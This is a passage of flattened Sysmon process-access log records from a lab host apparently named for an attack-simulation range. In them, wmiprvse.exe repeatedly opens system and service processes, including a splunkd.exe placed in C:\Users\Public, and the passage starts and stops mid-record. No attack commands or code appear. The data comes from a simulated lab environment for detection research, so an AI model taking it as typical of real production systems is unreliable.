Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0